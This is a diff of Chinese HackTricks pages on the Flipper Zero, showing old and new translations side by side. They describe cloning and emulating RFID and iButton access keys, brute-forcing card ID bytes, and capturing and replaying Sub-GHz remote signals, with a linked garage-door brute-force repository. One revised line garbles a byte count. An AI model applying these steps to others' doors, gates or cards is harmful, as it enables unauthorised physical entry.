请注意,一些对讲机会通过在读取之前发送写入命令来防止密钥复制。如果写入成功则该标签被视为伪造的。当Flipper模拟RFID时读卡器无法区分它与原始卡之间的区别,因此不会出现此类问题。
请注意,一些对讲机试图通过在读取之前发送写入命令来保护自己免受密钥复制。如果写入成功,则该标签被视为假标签。当 Flipper 模拟 RFID 时,读卡器无法将其与原始标签区分开,因此不会出现此类问题。
{% endhint %}
### 手动添加
您可以在Flipper Zero中创建**指示您手动输入的数据**的**伪造卡片**,然后模拟它。
您可以在 Flipper Zero 中创建 **假卡,指明您手动输入的数据**,然后模拟它。
#### 卡片上的ID
#### 卡片上的 ID
有时,当您获得一张卡时,您会发现卡片上写有ID或部分ID
有时,当您获得一张卡时,您会发现卡片上可见的 ID或部分 ID
* **EM Marin**
例如,在这张EM-Marin卡片中可以在实体卡片上**清晰地读取最后的5字节中的3个字节**。\
如果无法从卡片上读取它们另外2个字节可以通过暴力破解获得
例如,在这张 EM-Marin 卡中,物理卡上可以 **清晰地读取最后 3 个字节中的 5 个字节**。\
如果无法从卡片上读取其他 2 个字节,可以通过暴力破解获取
<figure><img src="../../../.gitbook/assets/image (104).png" alt=""><figcaption></figcaption></figure>
* **HID**
在这张HID卡只有3个字节中的2个字节可以在卡片上找到
在这张 HID 卡中也是如此,只有 3 个字节中的 2 个可以在卡片上找到
<figure><img src="../../../.gitbook/assets/image (1014).png" alt=""><figcaption></figcaption></figure>
### 模拟/写入
在**复制**卡或**手动输入**ID后可以使用Flipper Zero**模拟**它或将其**写入**真实卡片。
**复制** 一张卡或 **手动输入** ID 后,可以使用 Flipper Zero **模拟** 它或 **将其写入** 一张真实卡片。
## 参考
@ -71,16 +72,17 @@
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,22 +1,23 @@
# FZ - iButton
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
##
## 介
有关iButton是什么的更多信息,请查看:
有关 iButton 的更多信息,请查看:
{% content-ref url="../ibutton.md" %}
[ibutton.md](../ibutton.md)
@ -24,7 +25,7 @@
## 设计
以下图像中的**蓝色**部分是您需要**放置真实的iButton**以便Flipper可以**读取**的方式。**绿色**部分是您需要用Flipper zero**触摸读卡器**以**正确模拟iButton**的方式
下图的 **蓝色** 部分是您需要 **放置真实 iButton** 的位置,以便 Flipper 可以 **读取它。** **绿色** 部分是您需要用 Flipper zero **接触读卡器** 的方式,以 **正确模拟 iButton**
<figure><img src="../../../.gitbook/assets/image (565).png" alt=""><figcaption></figcaption></figure>
@ -32,18 +33,18 @@
### 读取
在读取模式下Flipper正在等待iButton密钥触,并能够处理三种类型的密钥:**DallasCyfral和Metakom**。 Flipper将**自行确定密钥类型**。密钥协议的名称将显示在ID号码上方的屏幕上。
在读取模式下Flipper 正在等待 iButton 密钥触,并能够处理三种类型的密钥:**Dallas、Cyfral 和 Metakom**。Flipper 将 **自动识别密钥类型**。密钥协议的名称将显示在 ID 号码上方的屏幕上。
### 手动添加
可以**手动添加**类型为:**DallasCyfral和Metakom**的iButton
可以 **手动添加** 类型为:**Dallas、Cyfral 和 Metakom** 的 iButton。
### **模拟**
可以**模拟**已保存的iButton读取或手动添加)。
可以 **模拟** 已保存的 iButtons(读取或手动添加)。
{% hint style="info" %}
如果无法使Flipper Zero的预期接触点触读卡器,您可以**使用外部GPIO**
如果无法使 Flipper Zero 的预期接触点触读卡器,您可以 **使用外部 GPIO**
{% endhint %}
<figure><img src="../../../.gitbook/assets/image (138).png" alt=""><figcaption></figcaption></figure>
@ -52,16 +53,17 @@
* [https://blog.flipperzero.one/taming-ibutton/](https://blog.flipperzero.one/taming-ibutton/)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,18 +1,19 @@
# FZ - Sub-GHz
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
**Try Hard Security Group**
@ -22,15 +23,15 @@
***
## <a href="#kfpn7" id="kfpn7"></a>
## 介 <a href="#kfpn7" id="kfpn7"></a>
Flipper Zero可以在300-928 MHz范围内**接收和发送无线电频率**,其内置模块可以读取、保存和模拟遥控器。这些遥控器用于与门、栅栏、无线电锁、遥控开关、无线门铃、智能灯等进行交互。Flipper Zero可以帮助您了解您的安全是否受到威胁。
Flipper Zero 可以 **接收和发送 300-928 MHz 范围内的无线电频率**,其内置模块可以读取、保存和模拟遥控器。这些遥控器用于与门、障碍物、无线电锁、遥控开关、无线门铃、智能灯等进行交互。Flipper Zero 可以帮助您了解您的安全是否受到威胁。
<figure><img src="../../../.gitbook/assets/image (714).png" alt=""><figcaption></figcaption></figure>
## Sub-GHz硬件 <a href="#kfpn7" id="kfpn7"></a>
## Sub-GHz 硬件 <a href="#kfpn7" id="kfpn7"></a>
Flipper Zero具有内置的基于[CC1101芯片](https://www.ti.com/lit/ds/symlink/cc1101.pdf)和无线电天线的次1 GHz模块。CC1101芯片和天线均设计用于在300-348 MHz、387-464 MHz和779-928 MHz频段工作。
Flipper Zero 具有基于 [](https://www.st.com/en/nfc/st25r3916.html#overview)[CC1101 芯片](https://www.ti.com/lit/ds/symlink/cc1101.pdf) 的内置 sub-1 GHz 模块和一根无线电天线(最大范围为 50 米。CC1101 芯片和天线均设计用于在 300-348 MHz、387-464 MHz 和 779-928 MHz 频段内工作。
<figure><img src="../../../.gitbook/assets/image (923).png" alt=""><figcaption></figcaption></figure>
@ -42,47 +43,47 @@ Flipper Zero具有内置的基于[CC1101芯片](https://www.ti.com/lit/ds/symlin
如何找到遥控器使用的频率
{% endhint %}
在分析时Flipper Zero会在频率配置中的所有可用频率上扫描信号强度RSSI。Flipper Zero会显示具有最高RSSI值的频率信号强度高于-90 [dBm](https://en.wikipedia.org/wiki/DBm)。
在分析时Flipper Zero 正在扫描频率配置中所有可用频率的信号强度 (RSSI)。Flipper Zero 显示 RSSI 值最高的频率,信号强度高于 -90 [dBm](https://en.wikipedia.org/wiki/DBm)。
要确定遥控器的频率,请执行以下操作:
1. 将遥控器放在Flipper Zero的左侧非常近的位置。
2. 转到**主菜单** **→ 次-GHz**。
3. 选择**频率分析仪**,然后按住要分析的遥控器上的按钮。
4. 在屏幕上查看频率值。
1. 将遥控器放置在 Flipper Zero 左侧非常靠近的位置。
2. 转到 **主菜单** **→ Sub-GHz**。
3. 选择 **频率分析仪**,然后按住您想要分析的遥控器上的按钮。
4. 查看屏幕上的频率值。
### 读取
{% hint style="info" %}
查找使用的频率信息(也是查找使用的频率的另一种方法)
查找使用的频率信息(也是查找使用的频率的另一种方法)
{% endhint %}
**读取**选项会**监听配置频率**上的指定调制默认为433.92 AM。如果在读取时**发现了什么**,屏幕上会提供**信息**。此信息可用于将来复制信号。
**读取**选项 **在指定调制下监听配置频率**:默认情况下为 433.92 AM。如果在读取时 **找到某些内容**,则 **屏幕上会显示信息**。这些信息可以用于将来复制信号。
在使用读取时,可以按下**左侧按钮**并**进行配置**。\
此时有**4种调制**AM270、AM650、FM328和FM476以及**存储的几个相关频率**
在使用读取时,可以按 **左按钮****进行配置**。\
此时它有 **4 种调制方式**AM270、AM650、FM328 和 FM476并且存储了 **几个相关频率**
<figure><img src="../../../.gitbook/assets/image (947).png" alt=""><figcaption></figcaption></figure>
您可以设置**您感兴趣的任何频率**,但是,如果您**不确定遥控器使用的是哪个频率**请将跳频设置为ON默认为关闭然后按下按钮多次直到Flipper捕获它并为您提供所需设置频率的信息。
您可以设置 **任何您感兴趣的频率**,但是,如果您 **不确定遥控器使用的频率**,请 **将跳频设置为开启**(默认关闭),并多次按下按钮,直到 Flipper 捕获到它并提供您设置频率所需的信息。
{% hint style="danger" %}
在频率之间切换需要一些时间,因此在切换时可能会错过发送的信号。为了获得更好的信号接收,设置由频率分析仪确定的固定频率。
在频率之间切换需要一些时间,因此在切换时传输的信号可能会丢失。为了更好的信号接收,请设置由频率分析仪确定的固定频率。
{% endhint %}
### **读取原始数据**
### **读取原始信号**
{% hint style="info" %}
在配置的频率上窃取(和重放)信号
窃取(并重放)配置频率上的信号
{% endhint %}
**读取原始数据**选项会**记录**在监听频率上发送的信号。这可用于**窃取**信号并**重放**它。
**读取原始信号**选项 **记录在监听频率上发送的信号**。这可以用于 **窃取** 信号并 **重复** 它。
默认情况下**读取原始数据也是在433.92的AM650中**,但是如果使用读取选项找到您感兴趣的信号在**不同的频率/调制**上,您也可以通过按左键(在读取原始数据选项内)进行修改
默认情况下 **读取原始信号也在 433.92 AM650**,但如果通过读取选项发现您感兴趣的信号在 **不同的频率/调制下,您也可以通过按左键进行修改**(在读取原始信号选项内)
### 暴力破解
如果您知道例如车库门使用的协议,可以**生成所有代码并使用Flipper Zero发送它们**。这是一个支持常见类型的车库的示例:[**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)
如果您知道例如车库门使用的协议,可以 **生成所有代码并使用 Flipper Zero 发送它们。** 这是一个支持一般常见类型车库的示例:[**https://github.com/tobiabocchi/flipperzero-bruteforce**](https://github.com/tobiabocchi/flipperzero-bruteforce)
### 手动添加
@ -93,33 +94,34 @@ Flipper Zero具有内置的基于[CC1101芯片](https://www.ti.com/lit/ds/symlin
#### [支持的协议列表](https://docs.flipperzero.one/sub-ghz/add-new-remote) <a href="#id-3iglu" id="id-3iglu"></a>
| Princeton\_433适用于大多数静态代码系统 | 433.92 | 静态 |
| ----------------------------------------- | ------ | ----- |
| Nice Flo 12bit\_433 | 433.92 | 静态 |
| Nice Flo 24bit\_433 | 433.92 | 静态 |
| CAME 12bit\_433 | 433.92 | 静态 |
| CAME 24bit\_433 | 433.92 | 静态 |
| Linear\_300 | 300.00 | 静态 |
| CAME TWEE | 433.92 | 静态 |
| Gate TX\_433 | 433.92 | 静态 |
| DoorHan\_315 | 315.00 | 动态 |
| DoorHan\_433 | 433.92 | 动态 |
| LiftMaster\_315 | 315.00 | 动态 |
| LiftMaster\_390 | 390.00 | 动态 |
| Security+2.0\_310 | 310.00 | 动态 |
| Security+2.0\_315 | 315.00 | 动态 |
| Security+2.0\_390 | 390.00 | 动态 |
### 支持的Sub-GHz供应商
| ------------------------------------------------ | ------ | ------- |
| Nice Flo 12bit\_433 | 433.92 | 静态 |
| Nice Flo 24bit\_433 | 433.92 | 静态 |
| CAME 12bit\_433 | 433.92 | 静态 |
| CAME 24bit\_433 | 433.92 | 静态 |
| Linear\_300 | 300.00 | 静态 |
| CAME TWEE | 433.92 | 静态 |
| Gate TX\_433 | 433.92 | 静态 |
| DoorHan\_315 | 315.00 | 动态 |
| DoorHan\_433 | 433.92 | 动态 |
| LiftMaster\_315 | 315.00 | 动态 |
| LiftMaster\_390 | 390.00 | 动态 |
| Security+2.0\_310 | 310.00 | 动态 |
| Security+2.0\_315 | 315.00 | 动态 |
| Security+2.0\_390 | 390.00 | 动态 |
请查看[https://docs.flipperzero.one/sub-ghz/supported-vendors](https://docs.flipperzero.one/sub-ghz/supported-vendors)
### 支持的 Sub-GHz 供应商
### 各地区支持的频率
查看列表 [https://docs.flipperzero.one/sub-ghz/supported-vendors](https://docs.flipperzero.one/sub-ghz/supported-vendors)
请查看[https://docs.flipperzero.one/sub-ghz/frequencies](https://docs.flipperzero.one/sub-ghz/frequencies)
### 按地区支持的频率
查看列表 [https://docs.flipperzero.one/sub-ghz/frequencies](https://docs.flipperzero.one/sub-ghz/frequencies)
### 测试
{% hint style="info" %}
获取保存频率的dBm
获取保存频率的 dBms
{% endhint %}
## 参考
@ -132,16 +134,17 @@ Flipper Zero具有内置的基于[CC1101芯片](https://www.ti.com/lit/ds/symlin
{% embed url="https://discord.gg/tryhardsecurity" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,55 +1,71 @@
# iButton
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}
##
## 介
iButton是一个电子识别钥匙的通用名称,包装在一个**硬币形状的金属容器**中。它也被称为**达拉斯触摸**存储器或接触存储器。尽管它经常被错误地称为“磁性”钥匙,但实际上里面**没有磁性**。事实上,里面隐藏着一个完整的**微芯片**,运行在数字协议上
iButton 是一种通用名称,指的是装在 **硬币形金属容器** 中的电子识别钥匙。它也被称为 **Dallas Touch** Memory 或接触式存储器。尽管它常常被错误地称为“磁性”钥匙,但它里面 **没有任何磁性**。实际上,里面隐藏着一个完整的 **微芯片**,它在数字协议上运行
<figure><img src="../../.gitbook/assets/image (915).png" alt=""><figcaption></figcaption></figure>
### 什么是iButton? <a href="#what-is-ibutton" id="what-is-ibutton"></a>
### 什么是 iButton <a href="#what-is-ibutton" id="what-is-ibutton"></a>
通常iButton意味着钥匙和读卡器的物理形式 - 一个圆形硬币带有两个接触点。对于围绕它的框架,有许多变体,从最常见的带有孔的塑料支架到戒指、吊坠等。
通常iButton 指的是钥匙和读卡器的物理形式 - 一个带有两个接触点的圆形硬币。围绕它的框架有很多变体,从最常见的带孔塑料支架到戒指、挂件等。
<figure><img src="../../.gitbook/assets/image (1078).png" alt=""><figcaption></figcaption></figure>
当钥匙到读卡器时,**接触点接触**,钥匙被供电以**传输**其ID。有时候钥匙**不能立即读取**,因为**对讲机的接触PSD比应该的大**。因此,钥匙和读卡器的外轮廓无法接触。如果是这种情况,您将不得不将钥匙按在读卡器的墙壁之一上。
当钥匙接触到读卡器时,**接触点接触**,钥匙被供电以 **传输** 其 ID。有时钥匙不会立即被 **读取**,因为 **对讲机的接触 PSD 比应有的要大**。因此,钥匙和读卡器的外部轮廓无法接触。如果是这种情况,您需要将钥匙按在读卡器的一个墙面上。
<figure><img src="../../.gitbook/assets/image (290).png" alt=""><figcaption></figcaption></figure>
### **1-Wire协议** <a href="#id-1-wire-protocol" id="id-1-wire-protocol"></a>
### **1-Wire 协议** <a href="#id-1-wire-protocol" id="id-1-wire-protocol"></a>
达拉斯钥匙使用1-Wire协议交换数据。只有一个用于数据传输的接触点在主从两个方向上从主设备到从设备反之亦然。1-Wire协议按照主从模型工作。在这种拓扑结构中主设备始终启动通信,从设备遵循其指令。
Dallas 钥匙使用 1-wire 协议交换数据。仅用一个接触点进行数据传输 (!!)双向传输从主设备到从设备反之亦然。1-wire 协议按照主从模型工作。在这种拓扑中,主设备始终发起通信,从设备遵循其指令。
当钥匙(从设备)接触对讲机(主设备)时,钥匙内部的芯片由对讲机供电钥匙被初始化。随后对讲机请求钥匙ID。接下来我们将更详细地查看这个过程。
当钥匙(从设备)接触对讲机(主设备)时,钥匙内部的芯片开,由对讲机供电,钥匙被初始化。随后,对讲机请求钥匙 ID。接下来我们将更详细地查看这个过程。
Flipper可以在主从模式下工作。在钥匙读取模式下Flipper充当读卡器也就是说它作为主设备工作。在钥匙仿真模式下Flipper假装是一个钥匙,处于从设备模式。
Flipper 可以在主模式和从模式下工作。在钥匙读取模式下Flipper 充当读卡器也就是说它作为主设备工作。在钥匙仿真模式下Flipper 假装是钥匙,处于从设备模式。
### 达拉斯、Cyfral和Metakom钥匙
### Dallas、Cyfral 和 Metakom 钥匙
有关这些钥匙如何工作的信息,请查看页面[https://blog.flipperzero.one/taming-ibutton/](https://blog.flipperzero.one/taming-ibutton/)
有关这些钥匙如何工作的更多信息,请查看页面 [https://blog.flipperzero.one/taming-ibutton/](https://blog.flipperzero.one/taming-ibutton/)
### 攻击
iButton可以使用Flipper Zero进行攻击:
iButtons 可以通过 Flipper Zero 进行攻击:
{% content-ref url="flipper-zero/fz-ibutton.md" %}
[fz-ibutton.md](flipper-zero/fz-ibutton.md)
{% endcontent-ref %}
## 参考资料
## 参考
* [https://blog.flipperzero.one/taming-ibutton/](https://blog.flipperzero.one/taming-ibutton/)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持 HackTricks</summary>
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,92 +1,108 @@
# 红外线
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
